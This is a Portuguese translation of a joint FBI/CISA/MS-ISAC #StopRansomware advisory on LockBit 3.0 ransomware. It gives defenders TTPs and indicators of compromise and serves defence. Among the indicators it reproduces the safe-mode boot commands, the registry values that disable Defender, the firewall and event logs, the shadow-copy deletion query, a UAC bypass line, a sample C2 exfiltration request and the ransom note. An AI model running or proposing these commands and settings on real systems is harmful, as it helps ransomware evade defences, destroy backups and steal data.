Agências governamentais dos EUA lançaram um alerta conjunto sobre o ransomware Lockbit 3.0

RESUMO

Observação: este comunicado conjunto sobre segurança cibernética (CSA) faz parte de um esforço contínuo #StopRansomware para publicar avisos para defensores de rede que detalham variantes de ransomware e agentes de ameaças de ransomware. Esses alertas #StopRansomware incluem táticas, técnicas e procedimentos (TTPs) observados recentemente e historicamente e indicadores de comprometimento (IOCs) para ajudar as organizações a se protegerem contra ransomware. Visite stopransomware.gov para ver todos os avisos #StopRansomware e saber mais sobre outras ameaças de ransomware e recursos gratuitos.

Ações a serem tomadas hoje para mitigar ameaças cibernéticas de ransomware:

• Priorize a correção de vulnerabilidades exploradas conhecidas.
• Treine os usuários para reconhecer e relatar tentativas de phishing.
• Habilite e reforce a autenticação multifator resistente a phishing.

O Federal Bureau of Investigation (FBI), a Cybersecurity and Infrastructure Security Agency (CISA) e o Multi-State Information Sharing & Analysis Center (MS-ISAC) estão lançando este CSA conjunto para disseminar IOCs e TTPs de ransomware LockBit 3.0 conhecidos identificados por meio de Investigações do FBI em março de 2023.

As operações do ransomware LockBit 3.0 funcionam como um modelo Ransomware-as-a-Service (RaaS) e são uma continuação das versões anteriores do ransomware, LockBit 2.0 e LockBit. Desde janeiro de 2020, o LockBit funciona como uma variante de ransomware baseada em afiliado; os afiliados que implantam o LockBit RaaS usam muitos TTPs variados e atacam uma ampla gama de empresas e organizações de infraestrutura crítica, o que pode tornar a defesa e a mitigação eficazes da rede de computadores um desafio.

O FBI, a CISA e o MS-ISAC incentivam as organizações a implementar as recomendações na seção de mitigação deste CSA para reduzir a probabilidade e o impacto de incidentes de ransomware.

Baixe a versão em PDF deste relatório:

#StopRansomware: Lockbit

DETALHES TÉCNICOS

Observação: este comunicado usa a estrutura MITRE ATT&CK® para empresas, versão 12. Consulte a seção Táticas e técnicas do MITRE ATT&CK para obter uma tabela das atividades dos agentes de ameaças mapeadas para o MITRE ATT&CK para empresas.

CAPACIDADES

O LockBit 3.0, também conhecido como “LockBit Black”, é mais modular e evasivo do que suas versões anteriores e compartilha semelhanças com Blackmatter e Blackcat ransomware.

O LockBit 3.0 é configurado na compilação com muitas opções diferentes que determinam o comportamento do ransomware. Após a execução real do ransomware em um ambiente de vítima, vários argumentos podem ser fornecidos para modificar ainda mais o comportamento do ransomware. Por exemplo, o LockBit 3.0 aceita argumentos adicionais para operações específicas em movimento lateral e reinicialização no modo de segurança (consulte os parâmetros da linha de comando do LockBit em Indicadores de comprometimento). Se um afiliado do LockBit não tiver acesso ao ransomware LockBit 3.0 sem senha, um argumento de senha será obrigatório durante a execução do ransomware. Os afiliados do LockBit 3.0 que não inserirem a senha correta não poderão executar o ransomware [ T1480.001]. A senha é uma chave criptográfica que decodifica o executável LockBit 3.0. Ao proteger o código dessa maneira, o LockBit 3.0 dificulta a detecção e análise de malware, sendo o código inexecutável e ilegível em seu formato criptografado. As detecções baseadas em assinatura podem falhar ao detectar o executável LockBit 3.0, pois a poção criptografada do executável varia de acordo com a chave criptográfica usada para criptografia, ao mesmo tempo em que gera um hash exclusivo. Quando fornecida a senha correta, o LockBit 3.0 irá descriptografar o componente principal, continuar a descriptografar ou descompactar seu código e executar o ransomware.

O LockBit 3.0 infectará apenas máquinas que não tenham configurações de idioma correspondentes a uma lista de exclusão definida. No entanto, se um idioma do sistema é verificado no tempo de execução é determinado por um sinalizador de configuração definido originalmente no tempo de compilação. Os idiomas na lista de exclusão incluem, entre outros, romeno (Moldávia), árabe (Síria) e tártaro (Rússia). Se um idioma da lista de exclusão for detectado [ T1614.001 ], o LockBit 3.0 interromperá a execução sem infectar o sistema.

ACESSO INICIAL

Os afiliados que implantam o ransomware LockBit 3.0 obtêm acesso inicial às redes das vítimas por meio da exploração do protocolo de área de trabalho remota (RDP) [ T1133 ], comprometimento de passagem [ T1189 ], campanhas de phishing [ T1566 ], abuso de contas válidas [ T1078 ] e exploração de aplicações de frente [ T1190 ].

PROCESSO DE EXECUÇÃO E INFECÇÃO

Durante a rotina de malware, se os privilégios não forem suficientes, o LockBit 3.0 tenta escalar para os privilégios necessários [ TA0004 ]. O LockBit 3.0 executa funções como:

• Enumerar informações do sistema, como nome do host, configuração do host, informações do domínio, configuração da unidade local, compartilhamentos remotos e dispositivos de armazenamento externos montados [ T1082 ]
• Encerramento de processos e serviços [ T1489 ]
• Lançamento de comandos [ TA0002 ]
• Habilitando logon automático para persistência e escalonamento de privilégios [ T1547 ]
• Exclusão de arquivos de log, arquivos na pasta da lixeira e cópias de sombra residentes no disco [ T1485 ], [ T1490 ]

O LockBit 3.0 tenta se espalhar por uma rede de vítimas usando uma lista pré-configurada de credenciais codificadas no momento da compilação ou uma conta local comprometida com privilégios elevados [ T1078 ]. Quando compilado, o LockBit 3.0 também pode habilitar opções para propagação via Objetos de Diretiva de Grupo e PsExec usando o protocolo Server Message Block (SMB). O LockBit 3.0 tenta criptografar os dados [ T1486 ] salvos em qualquer dispositivo local ou remoto, mas ignora os arquivos associados às principais funções do sistema.

Depois que os arquivos são criptografados, o LockBit 3.0 lança uma nota de resgate com o novo nome de arquivo <Ransomware ID>.README.txt e altera o papel de parede e os ícones do host para a marca LockBit 3.0 [ T1491.001 ]. Se necessário, o LockBit 3.0 enviará informações criptografadas de host e bot para um servidor de comando e controle (C2) [ T1027 ].

Depois de concluído, o LockBit 3.0 pode excluir a si mesmo do disco [ T1070.004 ], bem como quaisquer atualizações de Diretiva de Grupo feitas, dependendo de quais opções foram definidas no momento da compilação.

EXFILTRAÇÃO

Os afiliados do LockBit 3.0 usam Stealbit, uma ferramenta de exfiltração personalizada usada anteriormente com o LockBit 2.0 [ TA0010 ]; rclone, um gerenciador de armazenamento em nuvem de linha de comando de código aberto [ T1567.002 ]; e serviços de compartilhamento de arquivos publicamente disponíveis, como MEGA [ T1567.002 ], para exfiltrar arquivos de dados confidenciais da empresa antes da criptografia. Embora o rclone e muitos serviços de compartilhamento de arquivos publicamente disponíveis sejam usados ​​principalmente para fins legítimos, eles também podem ser usados ​​por agentes de ameaças para ajudar no comprometimento do sistema, exploração de rede ou exfiltração de dados. Os afiliados do LockBit 3.0 geralmente usam outros serviços de compartilhamento de arquivos disponíveis publicamente para exfiltrar dados também [ T1567 ] (consulte a Tabela 1).

APROVEITANDO FERRAMENTAS GRATUITAS E DE CÓDIGO ABERTO

Os afiliados do LockBit foram observados usando várias ferramentas freeware e de código aberto durante suas invasões. Essas ferramentas são usadas para uma variedade de atividades, como reconhecimento de rede, acesso remoto e tunelamento, despejo de credenciais e exfiltração de arquivos. O uso de scripts PowerShell e Batch é observado na maioria das invasões, que se concentram na descoberta do sistema, reconhecimento, busca de senha/credencial e escalonamento de privilégios. Artefatos de ferramentas profissionais de teste de penetração, como Metasploit e Cobalt Strike, também foram observados. Consulte a Tabela 2 para obter uma lista de freeware legítimo e ferramentas de código aberto que os afiliados da LockBit reaproveitaram para operações de ransomware:

INDICADORES DE COMPROMISSO (IOCS)

As características de IOCs e malware descritas abaixo foram derivadas da análise de campo. As amostras a seguir estão atualizadas em março de 2023.

LockBit 3.0 Ícone Preto

Papel de parede do LockBit 3.0

Parâmetros de linha de comando LockBit

-del

-gdel

-gspd

-pass (valor de 32 caracteres)

-path (arquivo ou caminho)

-psex

-safe

-wall

OBJETO DE EXCLUSÃO MÚTUA (MUTEX) CRIADO

Quando executado, o LockBit 3.0 criará o mutex Global\<MD4 hash of machine GUID>
e verificará se esse mutex já foi criado para evitar a execução de mais de uma instância do ransomware.

IGNORAR UAC VIA INTERFACE COM ELEVADA

O LockBit 3.0 é capaz de ignorar o Controle de Conta de Usuário (UAC) para executar código com privilégios elevados por meio da interface COM (Component Object Model) elevada. C:\Windows\System32\dllhost.exe é gerado com alta integridade com a linha de comando GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC .

Por exemplo, %SYSTEM32%\dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}.

EXCLUSÃO DE CÓPIA DE SOMBRA DE VOLUME

LockBit 3.0 usa Windows Management Instrumentation (WMI) para identificar e excluir cópias de sombra de volume. O LockBit 3.0 usa select * de Win32_ShadowCopy para consultar cópias de sombra de volume, Win32_ShadowCopy.ID para obter o ID da cópia de sombra e DeleteInstance para excluir quaisquer cópias de sombra.

ARTEFATOS DE REGISTRO

Ícone LockBit 3.0

HKCR\. <Extensão de malware>

(Default)

<Extensão de malware>

HKCR\< 
Extensão de Malware>\DefaultIcon

(Default)

C:\ProgramData\<Mal 
ware Extension>.ico

Papel de parede do LockBit 3.0

HKCU\Control Panel\Desktop\WallPaper

(Default)

C:\ProgramData\<Mal ware Extension>.bmp

Desativar experiência de configurações de privacidade

SOFTWARE\Policies\Microsoft\Windows\OOBE

DisablePrivacyE 
xperience

Ativar logon automático

SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon

AutoAdminLogon

1

DefaultUserName

<username>

DefaultDomainNa 
me

<username>

DefaultPassword

<password>

Desativar e limpar logs de eventos do Windows

HKLM\SOFTWARE\Microsoft\Windows 
\CurrentVersion\WINEVT\Channels 
\*

Enabled

0

HKLM\SOFTWARE\Microsoft\Windows 
\CurrentVersion\WINEVT\Channels 
\* \ChannelAccess

ChannelAccess

AO:BAG:SYD:(A;;0x1;; 
;SY)(A;;0x5;;;BA)(A; 
;0x1;;;LA)

LOCAIS DE RESGATE

ADMIN$\Temp\<LockBit3.0 Filename>.exe

%SystemRoot%\Temp\<LockBit3.0 Filename>.exe

\<Domain Name>\sysvol\<Domain Name>\scripts\
<Lockbit 3.0 Filename>.exe (Domain Controller)

COMANDOS DE LANÇAMENTO DO MODO DE SEGURANÇA

O LockBit 3.0 possui um recurso de modo de segurança para contornar o antivírus e a detecção de endpoint. Dependendo do sistema operacional do host, o seguinte comando é iniciado para reinicializar o sistema no modo de segurança com rede:

bcdedit /set {current} safeboot network

bootcfg /raw /a /safeboot:network /id 1

bcdedit /deletevalue {current} safeboot

bootcfg /raw /fastdetect /id 1

ARTEFATOS DA POLÍTICA DE GRUPO

A seguir estão os arquivos XML (Extensible Markup Language) da Diretiva de Grupo identificados após uma infecção por LockBit 3.0:

O Services.xml interrompe e desativa os serviços nos hosts do Active Directory (AD).

REGISTRY.POL

A configuração do registro a seguir altera os valores para o tempo de atualização da Política de Grupo, desativa o SmartScreen e desativa o Windows Defender.

HKLM\SOFTWARE\Policies\Microsoft\Window
s\System

GroupPolicyRefresh
TimeDC

REG_D
WORD

1

HKLM\SOFTWARE\Policies\Microsoft\Window
s\System

GroupPolicyRefresh
TimeOffsetDC

REG_D
WORD

1

HKLM\SOFTWARE\Policies\Microsoft\Window
s\System

GroupPolicyRefresh
Time

REG_D
WORD

1

HKLM\SOFTWARE\Policies\Microsoft\Window
s\System

GroupPolicyRefresh
TimeOffset

REG_D
WORD

1

HKLM\SOFTWARE\Policies\Microsoft\Window
s\System

EnableSmartScreen

REG_D
WORD

0

HKLM\SOFTWARE\Policies\Microsoft\Window
s\System

**del.ShellSmartSc
reenLevel

REG_S
Z

HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender

DisableAntiSpyware

REG_D
WORD

1

HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender

DisableRoutinelyTa
kingAction

REG_D
WORD

1

HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender\Real-Time Protection

DisableRealtimeMon
itoring

REG_D
WORD

1

HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender\Real-Time Protection

DisableBehaviorMon
itoring

REG_D
WORD

1

HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender\Spynet

SubmitSamplesConse
nt

REG_D
WORD

2

HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender\Spynet

SpynetReporting

REG_D
WORD

0

HKLM\SOFTWARE\Policies\Microsoft\Window
sFirewall\DomainProfile

EnableFirewall

REG_D
WORD

0

HKLM\SOFTWARE\Policies\Microsoft\Window
sFirewall\StandardProfile

EnableFirewall

REG_D
WORD

0

FORÇAR ATUALIZAÇÃO DE GPU

Depois que novas políticas de grupo são adicionadas, um comando do PowerShell usando atualização de política de grupo (GPUpdate) aplica as novas alterações de política de grupo a todos os computadores no domínio AD.

SERVIÇOS ELIMINADOS

PROCESSOS ENCERRADOS

LOCKBIT 3.0 RANSOM NOTE

NOTA DE RESGATE LOCKBIT 3.0

~~~ LockBit 3.0, o ransomware mais rápido e estável do mundo desde 2019~~~
>>>>> Seus dados são roubados e criptografados.
Se você não pagar o resgate, os dados serão publicados em nossos sites TOR darknet. Lembre-se de que, uma vez que seus dados apareçam em nosso site de vazamento, eles podem ser comprados por seus concorrentes a qualquer segundo, portanto, não hesite por muito tempo. Quanto mais cedo você pagar o resgate, mais cedo sua empresa estará segura.

CONEXÕES DE REDE

Se configurado, o Lockbit 3.0 enviará duas solicitações HTTP POST para um dos servidores C2. As informações sobre o host e o bot da vítima são criptografadas com uma chave AES (Advanced Encryption Standard) e codificadas em Base64.

Example of HTTP POST request
POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit
ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in encrypted data
{
"bot_version":"X",
"bot_id":"X",
"bot_company":"X", "host_hostname":"X", "host_user":"X",
"host_os":"X",
"host_domain":"X",
"host_arch":"X",
"host_lang":"X", "disks_info":[
{
"disk_name":"X",
"disk_size":"XXXX", "free_size":"XXXXX"
}

USER AGENT STRINGS

TÉCNICAS MITRE ATT&CK

#StopRansomware: Lockbit

Fonte: CISA